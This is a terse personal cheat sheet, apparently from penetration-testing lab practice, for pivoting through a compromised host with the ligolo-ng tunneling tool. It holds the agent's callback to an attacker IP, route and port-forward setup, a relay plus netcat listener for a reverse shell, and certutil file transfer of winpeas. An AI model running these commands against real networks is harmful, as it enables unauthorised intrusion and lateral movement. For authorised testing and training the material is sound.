$ sudo ip tuntap add user [root] mode tun ligolo
$ sudo ip link set ligolo up
./proxy -selfcert

====================
agent.exe -connect ***10.10.14.43:11601*** -ignore-cert
====================

session
ifconfig

#only if u want to pivot
sudo ip route add [ip.0/24] dev ligolo #[new window to add to route]
#sudo ip route del 10.129.227.77/32 dev ligolo

#skip above if you only ports frwd
session
start

# then start your usual scanning

==================== single portfrwd ====================

listener_add --addr 127.0.0.1:8443 --to [vic_IP]:8443
#add /etc/hosts 127.0.0.1 target.lan if needed

==================== to get rce from host2 ====================

listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 #any connection on 1234 will come to use 4321
nc -nvlp 4444

==================== to download files from host2 ====================

listener_add --addr 0.0.0.0:1235 --to 127.0.0.1:80 #another listener to upload winpeas
certutil [Internal IP:1235]

#additional commands
listener_list #listing